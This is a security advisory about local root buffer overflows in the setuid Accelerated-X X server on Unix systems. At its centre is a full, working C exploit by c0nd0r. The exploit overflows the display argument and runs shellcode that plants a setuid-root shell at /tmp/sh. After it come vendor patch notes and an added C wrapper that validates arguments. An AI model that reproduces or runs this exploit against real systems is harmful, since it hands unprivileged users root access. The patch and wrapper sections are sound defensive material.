COMMAND

    Accelerated-X

SYSTEMS AFFECTED

    Unices (Linux, FreeBSD, Solaris/x86, SCO)

PROBLEM

    Following is based on KSR[T] Advisory #011.  Local users can gain
    administrative privileges by exploiting multiple buffer overflows
    (stack overwrites) in the Accelerated-X X server.

    Accelerated-X  Server  is  a  commercial  X  server available from
    http://www.xig.com/.  By default, the X server is installed setuid
    root so that when it is executed by a user it still retains enough
    privilege  to  load  drivers,  manipulate  the  display,  and  log
    information.   However,  due  to  insufficient  bounds checking on
    command-line parameters, an attacker can overflow the X server  by
    specifying a  48 byte  display string,  or through  a long  string
    passed into the -query command  line parameter.  Local users  that
    can execute the Accelerated-X Xserver can obtain root  privileges.
    (KSR[T]  would  like  to  thank  Chris  Evans for pointing out the
    -query  buffer  overflow  as  well  as  additional  security holes
    relating to command line parameters)

    Here is the exploit for the Accelerated-X buffer overflow.  c0nd0r
    checked  the  '-query'  argument  and  found  out that it will not
    overwrite the return address, so it cannot be used for exploitation.
    The argument '-indirect' behaves in the same way.

    /*
     * SDI linux exploit for Accelerate-X
     * Sekure SDI - Brazilian Information Security Team
     * by c0nd0r <condor@sekure.org>
     *
     * This script will exploit a vulnerability found by KSRT team
     * in the Accelerate-X Xserver [<=5.0].
     *
     * --------------------------------------------------------------------
     * The vulnerable buffer was small so we've changed the usual order to:
     * [garbage][eip][lots nop][shellcode]
     * BTW, I've also changed the code to execute, it will create a setuid
     * shell owned by the superuser at /tmp/sh.
     * --------------------------------------------------------------------
     *
     * Warning: DO NOT USE THIS TOOL FOR ILLICIT ACTIVITIES! We take no
     *          responsibility.
     *
     * Greets to jamez, bishop, bahamas, stderr, dumped, paranoia,
     *           marty (NORDO!), vader, fcon, slide, c_orb and
     *           specially to my sasazita. Also toxyn.org, pulhas.org,
     *           superbofh.org (Phibernet rox) and el8.org.
     *
     * Laughs - lame guys who hacked the senado/planalto.gov.br
     * pay some attention to the site: securityfocus.com (good point).
     * see you at #uground (irc.brasnet.org)
     */

    #include <stdio.h>
    #include <stdlib.h>     /* atoi */
    #include <string.h>     /* strlen */
    #include <unistd.h>     /* execl */

    /* generic shellcode; the trailing string is the command it runs */
    char shellcode[] =
        "\xeb\x31\x5e\x89\x76\x32\x8d\x5e\x08\x89\x5e\x36"
        "\x8d\x5e\x0b\x89\x5e\x3a\x31\xc0\x88\x46\x07\x88"
        "\x46\x0a\x88\x46\x31\x89\x46\x3e\xb0\x0b\x89\xf3"
        "\x8d\x4e\x32\x8d\x56\x3e\xcd\x80\x31\xdb\x89\xd8"
        "\x40\xcd\x80\xe8\xca\xff\xff\xff"
        "/bin/sh -c cp /bin/sh /tmp/sh; chmod 6755 /tmp/sh";

    int main ( int argc, char *argv[] ) {
     char buf[1024];
     int x, y, offset=1000;
     long addr;
     int joe;

     /* optional first argument: offset to add to the guessed stack address */
     if (argc > 1)
       offset = atoi ( argv[1]);

     /* return address: an address in this stack frame plus the offset */
     addr = (long) &joe + offset;

     /* display string: ':' followed by filler up to the saved return address */
     buf[0] = ':';
     for ( x = 1; x < 53; x++)
      buf[x] = 'X';

     /* overwrite the saved return address (little-endian) */
     buf[x++] = (addr & 0x000000ff);
     buf[x++] = (addr & 0x0000ff00) >> 8;
     buf[x++] = (addr & 0x00ff0000) >> 16;
     buf[x++] = (addr & 0xff000000) >> 24;

     /* NOP sled, then the shellcode */
     for (  ; x < 500; x++)
      buf[x] = 0x90;

     for ( y = 0; y < strlen(shellcode); y++, x++)
      buf[x] = shellcode[y];

     /* terminate the argument string */
     buf[x] = '\0';

     fprintf (stderr, "\nSDI Xaccel - Offset: %d | Addr: 0x%lx\n\n",
              offset, addr);

     execl ( "/usr/X11R6/bin/Xaccel", "Xaccel", buf, (char *)0);

    // setenv ( "EGG", buf, 1);
    // system ( "/bin/sh");

     return 0;
    }

SOLUTION

    For AccelX 5.x: XiG  has made  a patch  available for 5.0.1  which
                    corrects these  and other  potential command  line
                    interface  security  holes.   Users  running 5.0.0
                    have to  apply the  5.0.1 patch  prior to applying
                    the 5.0.2 patch.  The patch is available at

                    ftp://ftp.xig.com/pub/updates.

    For AccelX 4.x: Patch will be made available shortly.  An  interim
                    solution  is  to  use  an  X server wrapper, or to
                    limit access  to the  Xaccel binary  via a special
                    group.

    The upcoming  release of  Maximum CDE  2.1 comes  with the 5.0.2 X
    Server, and is not vulnerable to these attacks.
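
    The interim "X server wrapper" mentioned above, written out as an
    added example (this is not part of the advisory, nor XiG's code).
    The idea is that the setuid bit moves from the real server to a small
    wrapper that checks the command line first: the display string must
    be ":N" or ":N.M" and short, the values of -query and -indirect are
    length-bounded, and every other argument is length-bounded as well,
    so an over-long parameter never reaches the server's own parsing.
    The path of the renamed real binary (Xaccel.real), the length limits
    and the option names handled are assumptions for this example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Assumed layout: the real setuid server is renamed and this wrapper takes
 * its place; the wrapper itself is installed setuid root and group-limited. */
#define REAL_SERVER     "/usr/X11R6/bin/Xaccel.real"
#define MAX_DISPLAY_LEN 16    /* ":65535.99" and friends fit; 48 bytes do not */
#define MAX_ARG_LEN     255   /* assumed upper bound for any single argument */

/* Accept only ":N" or ":N.M" with N and M decimal, and bounded total length. */
int valid_display(const char *s)
{
    size_t n = strlen(s);
    int seen_dot = 0, digits = 0;

    if (n < 2 || n > MAX_DISPLAY_LEN || s[0] != ':')
        return 0;
    for (size_t i = 1; i < n; i++) {
        if (isdigit((unsigned char)s[i])) {
            digits++;
        } else if (s[i] == '.' && !seen_dot && digits > 0) {
            seen_dot = 1;
            digits = 0;          /* a screen number must follow the dot */
        } else {
            return 0;
        }
    }
    return digits > 0;
}

/* Options that take a host name value in the advisory's description. */
static const char *host_opts[] = { "-query", "-indirect", NULL };

/* Return 1 if every argument passes, 0 at the first rejected one. */
int validate_args(int argc, char *argv[])
{
    for (int i = 1; i < argc; i++) {
        const char *a = argv[i];

        /* blanket bound: no argument of any kind may be over-long */
        if (strlen(a) > MAX_ARG_LEN)
            return 0;

        if (a[0] == ':') {
            if (!valid_display(a))
                return 0;
            continue;
        }
        for (const char **o = host_opts; *o; o++) {
            if (strcmp(a, *o) == 0) {
                /* the option needs a value, and that value is bounded too */
                if (i + 1 >= argc || strlen(argv[i + 1]) > MAX_ARG_LEN)
                    return 0;
                i++;             /* consume the option's value */
                break;
            }
        }
    }
    return 1;
}

int main(int argc, char *argv[])
{
    if (!validate_args(argc, argv)) {
        fprintf(stderr, "Xaccel wrapper: rejected command line\n");
        return 1;
    }
    argv[0] = "Xaccel";          /* the real server sees its usual name */
    execv(REAL_SERVER, argv);
    perror("execv");             /* only reached if the exec failed */
    return 1;
}
```

    A stricter deployment would allowlist the options the site actually
    uses and reject everything else, since the advisory notes that other
    command-line parameters had problems as well; the length bound on
    every argument is the minimum that covers that class.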